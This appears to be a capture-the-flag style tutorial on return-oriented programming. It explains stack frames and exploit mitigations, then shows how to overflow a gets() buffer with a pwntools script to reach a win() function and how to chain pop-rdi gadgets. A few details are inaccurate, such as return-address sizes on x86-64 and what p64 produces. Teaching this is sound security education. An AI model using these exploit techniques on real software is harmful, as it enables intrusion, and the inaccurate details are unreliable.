# ROP Please use a real tool (i.e. GDB, pwntools, etc) to do ROP. The tools might be a little intimidating, but they WILL save you time overall. ## Buffer Overflow --> ROP So what is ROP?? ROP stands for Return Oriented Programming. Last week, we saw buffer overflows. This is a **big** vulnerability, but buffer overflow challenges we've given so far are relatively contrived. Some check that a certain value hasn't been changed, or has been changed to a specific value, to control code execution. So people mitigate these vulnerabilites. Here are some ways how: **Canaries:** check a certain value on the stack hasn't changed-if it has, buffer overflow has happened *can be beaten if you can figure out the canary* **ASLR:** Address Space Layout Randomization A simple compiled program will have each function at a given location. Then, when we run the program over and over, the function is at the same *address*. If we're using a function from a library (like libc), this means that powerful (*dangerous*) functions will be at the same address, like `system(char*)`. If I want to run this function, all I would need to do is find its address in the library, and jump code execution to that position. However, ASLR means that libc (and other libraries) are loaded into a random address every time, meaning that you *can't* just look in LibC for the address of a function to transfer control to it. *but you can find out the address of the library when the executable is running... if I can find the address of ANY function in the library, I know the address of EVERY function in the library, because the entire library is moved to a random memory address* **PIE:** Position Independent Executable. Same as ASLR but for the executable itself; the entire executable is loaded to a random address *every time it is run*. *but you can find out the address of the executable when the executable is running... if I can find the address of ANY function, I know the address of EVERY function* **No-executable:** Mark stack addresses as unexecutable; we can't just *run code* that's put on the stack. One threat from buffer overflow is that an attacker could theoretically put raw machine code onto the stack, and then redirect execution to it by changing the return address of the current function (for how to change the return address keep reading). *well then we'll just RUN THE CODE THATS ALREADY EXECUTABLE; this is ROP* ## ROP Overview I will give a *general overview* followed by specific details. This section will show a abstract description of the technique, and the next section will show why and how it works. So this is the stack... When a function is called, the following things happen... ![framers](https://hackmd.io/_uploads/rJxG-pLnT.jpg) Note some terms; BP in the image, or `rbp` in x86-64, is the FRAME pointer; it refers to the location on the stack where we've started pushing the current function's local variables to. SP in the image or `rsp` in x86-64 refers to the STACk pointer; what is the MAXIMUM stack address. ### Function Calls First, the computer takes the current code execution address, and pushes it to the stack. Then, the computer transfer code execution to the function we want to call. (using `call`) Then the computer notes the current address, of `rsp`, and stores it in `rbp`, and pushes a dummy value to the stack. From this address on down, the stack will store local variables. The function then DECREASES the stack pointer (`rsp`). `rsp` decreases, and the space between `rsp` and `rbp` can be used for local variables. Lets see this in action: ``` C void foo() { char arr[16]; //pt2: gets(arr); //pt3 return; } int main() { //pt1: foo(); //pt4 return out; } ``` So what this looks like on the stack is this; at `pt1` ``` HIGH numbered memory addresses | ...... | | local vars for main | | local vars for main | | rsp --> | | unused space | | unused space | | unused space | | unused space | | unused space | Low numbered memory addresses ``` So now we've seen `pt1` Now for `pt2` ``` HIGH numbered memory addresses | ...... | | local vars for main | | local vars for main | | address of pt4 | | rbp --> [rbp at pt1] | | char arr[16] | | rsp --> | | unused space | | unused space | | unused space | Low numbered memory addresses ``` First; notice that the stack grows *down*, from high to low memory addresses. Second, note that in the executable `foo` has no way to refer to variables like `arr` using their name or their type. The *only* way the executable can refer to local variables like the return address and `arr` is by referencing `rbp`. If you want to write `arr[5] = 0xff`, the executable will take the address `rbp`, subtract 11, and write 0xff to that memory address. In C pointer syntax; `*(rbp - 11) = 0xff;` **This is important.** Finally, notice that the `foo` needs a way to return code execution to `main`. This is why `address of pt4` is pushed to the stack; so that `foo` can "remember" where it was called from and the program can continue executing the code in `main`. at `pt3` some stuff happens... Initially the stack looks like this ``` HIGH numbered memory addresses | ...... | | local vars for main | | local vars for main | | address of pt4 | | rbp --> [rbp at pt1] | | char arr[16] | | rsp --> | | unused space | | unused space | | unused space | Low numbered memory addresses ``` The keyword `return` does some things; it shrinks the stack by the number of bytes it added before, removing the local variables. Additionally, `rbp` is restored to it's value before the function call (the value of `rbp` at `pt1`) ``` HIGH numbered memory addresses | ...... | | local vars for main | | local vars for main | | address of pt4 | | rsp --> | | unused space | | unused space | | unused space | | unused space | Low numbered memory addresses ``` Then, the `address of pt4` is popped from the stack, decreasing `rsp` and this address is put into the program counter register. Program execution then resumes at `pt4`. Yay! We've called a function. Note that this process happens for every (non `__always_inline`) function. ...So what if we do a little trolling?? ### Corrupting a Return Pointer When `foo()` calls `gets(arr)`, what if we just write random garbage to the stack, and get a buffer overflow of `arr`? So: ``` C void foo() { char arr[16]; //pt2: // **We are here rn** gets(arr); //pt3 return; } ``` This is what the stack looks like; ``` HIGH numbered memory addresses | ...... | | local vars for main | | local vars for main | | address of pt4 | | rbp --> [rbp at pt1] | | char arr[16] | | rsp --> | | unused space | | unused space | | unused space | Low numbered memory addresses ``` Now, when `gets` is called, we write "qwerqwerqwerqwerZXCVZXCVasdf"... This causes a buffer overflow. The first 16 bytes get written to `arr`, and the rest corrupt the return address. This is what the stack looks like now; ``` HIGH numbered memory addresses | ...... | | local vars for main | | local vars for main | | "asdf\0" | | rbp --> "ZXCVZXCV" | | char arr[16] = "qwerqwerqwerqwer"; | | rsp --> | | unused space | | unused space | | unused space | Low numbered memory addresses ``` We wrote the first 16 chars to the `arr`, the next 8 overwrite the old `rbp` and the *next 4 have overwritten the return address* So lets go to `pt3` ``` C void foo() { char arr[16]; //pt2: gets(arr); //pt3 // **We are here rn** return; } ``` Per normal, the stack is shrunk It shrinks the stack by the number of bytes it added before, removing the local variables. `rbp` is set to the value that it used to point to; i.e. `rbp` is now the same value before the function was called. ``` HIGH numbered memory addresses | ...... | | local vars for main | | local vars for main | | "asdf\0" | | rsp --> | | unused space | | unused space | | unused space | | unused space | Low numbered memory addresses ``` Now note that when we try to jump to the return address, we *instead* go to the address corresponding to the string `"asdf"`; this is `0x66647361`, when parsed little-endian style (I'll describe how to do this in code later). So now the computer starts trying to execute code at the memory address `0x66647361`. This is probably illegitamate... so we segfault. But what if we put a *specific* memory address there there? A specific place to move code execution to? Well... Thats called "ROP". ## Using GDB to Understand ROP ``` C #include "stdio.h" void win() { //Win here printf("%s", "You just won woohoo!!\n"); } void vuln() { char arr[16]; //pt1 gets(arr); //pt2 printf("Just recved %s\n",arr); } int main() { vuln(); return 0; } ``` Consider this code Lets assume that `win` gives a flag... how do we call it? ### IMPORTANT NOTE NOTE: ROP will almost always be more complex than this. **You usually will want to return execution to the middle or end of a function, not the beginning**. Technically, you can return execution to any memory address marked "executable", but this is usually code in functions... See [here](#ROP-Chains) for more about this. Well with that out of the way, let's see how \(basic) ROP works.. But first; quick refresher on how function calls work GDB screenshot at pt1 ![Screenshot_2024-02-23_21_07_13](https://hackmd.io/_uploads/SyYbeA83p.png) I then input `1234568qwertyi` when to `gets` so at `pt2` ![Screenshot_2024-02-23_21_07_27](https://hackmd.io/_uploads/H1JjeAI2T.png) Note in the middle box: `$rsp` (which is the stack pointer), pointing to "12345678qwertyui" Below, we see `rbp`, and below that, we see `<main+14>`. This is the RETURN ADDRESS that we wanna corrupt. So lets do it. Okay so now let's input "1234567812345678qwertyui[WINPTR]" The "1234567812345678" fills `arr`, "qwertyui" fills the location`rbp` points to, and finally, [WINPTR] fills the return address ....but how tf do we type some random memory address?? Lets use pwntools!! ## Pwntools ROP We've just seen how to get the offset from the buffer to the return address in GDB. This is the same as saying "We now know how much random garbage we need to input before we can corrupt the return pointer". You can *also* use pwntools. <b> <details> <summary>How to get return pointer offset from Pwntools</summary> ``` python from pwn import * import time #adapted from kavigihan medium article r = process("./out") elf = ELF("./out") #form a cyclic pattern pat = cyclic(100) r.sendline(pat) #wait for ./out to crash time.sleep(1) ``` What we've just done is crashed the binary using a cyclic pattern. The binary tried to jump to a memory address that doesn't exist, and created a `SEGFAULT`. But this means that debugging information, and the program state prior to crashing was dumped... ``` python #read program state core = Coredump("./core") #Find the invalid address it tried to jump to seg_addr = int("0x" + hex(core.fault_addr)[10:], 16) ``` Now, since we used cyclic patterns, we can find the offset from the buffer to the return address ``` python #the address we tried to jump to before segfault print(f"Core fault address at: {hex(core.fault_addr)}") #Find the offset for the address print(f"Finding offset for : {hex(seg_addr)}") offset = cyclic_find(seg_addr) # After this many bytes, we can overwrite the return address print(f"Offset found at : {offset}") ``` </details> </b> ### Using the Offset to Run Code Now we've found the offset from the buffer to the return address. 24 bytes. That means that if we write 24 bytes to the "gets" function, the next 4 will corrupt the return pointer. I showed how to do this in GDB, but it can't hurt to know how to do this in code. Now we have to craft a payload To corrupt the return address, we need to write `offset` garbage bytes followed by the [WINPTR]. ``` python # cast win address to a little-endian 4 byte number # elf.symbols['win'] gets the address of the win function # p64 turns it into little-endian bytes win_addr = p64(elf.symbols['win']) # Make final payload payload = b"1" * offset + win_addr # Store payload for debugging open("payload.dat","wb+").write(payload) # Send payload and win win = process("./out") win.sendline(payload) print(win.recvline()) print(win.recvline()) ``` Note that I store the payload to `payload.dat`. I like to do this, because in GDB, I can write `r < <(cat payload.dat)` to feed the executable with the payload I just made. But since I'm in GDB, I can see exactly what the payload is doing step-by-step. ## ROP Chains Right now, we have a `win` function... But thats not that realistic is it?? Luckily, we can return execution to *any point*... I'll say that again Luckily, we can return execution to *any point* in the binary... In practice, most of the code in the binary does specific thing the programmer wants it to do. So you have to be clever. You have to find a way of executing the existing code to acheive what you want. At the end of each function is a `return`... This means we can chain things together Take this code ``` C void foo() { char arr[16]; gets(arr); // Point A return; } void bar() { //USELESS CODE //point B //[USEFUL CODE] return; } void baz() { //USELESS CODE //Point C //[USEFUL CODE] return; } int main() { foo(); return 1; } ``` At Point A, lets *say* we used the techniques shown previously to overwrite the return address. Lets also say that we put an *extra* address after it. ``` HIGH numbered memory addresses | ...... | | local vars for main | | <Point C address> | | <Point B address> | | rsp --> | | unused space | | unused space | | unused space | | unused space | Low numbered memory addresses ``` What'll happen?? Well, we'll jump to point B. At point B, the situation will be this ``` HIGH numbered memory addresses | ...... | | local vars for main | | <Point C address> | | rsp --> | | unused space | | unused space | | unused space | | unused space | Low numbered memory addresses ``` After some of the code gets run, we hit the ```C return; ``` And NOW, code execution continues at point C! NOTE: we're not just limited to calling existing functions. We've successfully run the *useful* snippets of `bar` and `baz`, and ignored the useless ones. These "useful" sections above a `return` are called "gadgets". ## Gadgets Let's say that in some file, there is a function `void print_file(char* in);`, that prints the contents of `in` to `STDOUT`. Now let's consider a hypothetical function in the same file, `int qux()` Let's say it's assembly (x86-64 style) looks like this ``` asm push rbp mov rbp, rsp ; ... ; some calculations we're not interested in ; ... pop rdi leave ret ``` We're not interested in those calculations. We DON'T CARE what `qux` is meant to do. But we might be able to use those last few instructions. When the last few instructions of a function have some sort of useful functionality, they are known as a **gadget**. We can see gadgets by running in the terminal ``` zsh ROPgadget --binary [FILE] ``` or in pwntools Note that pwntools excludes some gadgets... you might want to try both just in case. ``` python ... elf = ELF("./out") rop = ROP(elf) print(rop.gadgets) ``` Let's say we return the execution address to the ```asm pop rdi ``` Before that runs, the stack looks like this ``` HIGH numbered memory addresses | ...... | | address of print_file | | "flag.txt" | | rsp --> | | unused space | | unused space | | unused space | | unused space | Low numbered memory addresses ``` `pop` will take the next value on the stack, put it into the specified register, and then increase the stack pointer. So afterwards: The `rdi` register holds "flag.txt". And the stack is like: ``` HIGH numbered memory addresses | ...... | | address of print_file | | rsp --> | | unused space | | unused space | | unused space | | unused space | Low numbered memory addresses ``` But recall that after the "pop" instruction, there is a "ret"... So when execution hits the "return" instruction, execution goes to `print_file`... But wait!!! RDI is the register that holds the first argument in x86-64 linux. So when we call `print_file`, we'll print `flag.txt`. This is the essence of ROP; to chain together gadgets in the executable, to create a winning condition.